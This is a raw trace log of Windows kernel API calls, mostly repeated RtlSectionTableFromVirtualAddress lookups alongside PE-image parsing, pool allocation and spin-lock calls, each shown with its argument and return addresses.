| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff96200170000, MappedAsImage = 1, Directory = 0x0, Size_ptr_out = 0xffffd0002d573808, ret_val_ptr_out = 0xfffff962004d5000 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff96200170000, MappedAsImage = 1, Directory = 0xc, Size_ptr_out = 0xffffd0002d573808, ret_val_ptr_out = 0xfffff962004be000 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff96200170000, MappedAsImage = 1, Directory = 0xa, Size_ptr_out = 0xffffd0002d573808, ret_val_ptr_out = 0xfffff96200450680 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x538ff, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c9ad000 |
| ExFreePool | P_ptr = 0xffffe0003c959000 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff96200170000, ret_val_unk_out = 0xfffff962001700f0 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961fff0d000 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961fff0d000 |
| MmIsSessionAddress | ret_val_out = 0x1 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffe00000, ret_val_unk_out = 0xfffff961ffe000f0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x57f5a, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003ca01000 |
| ExFreePool | P_ptr = 0xffffe0003c9ad000 |
| ExAcquireSpinLockSharedAtDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| ExReleaseSpinLockSharedFromDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
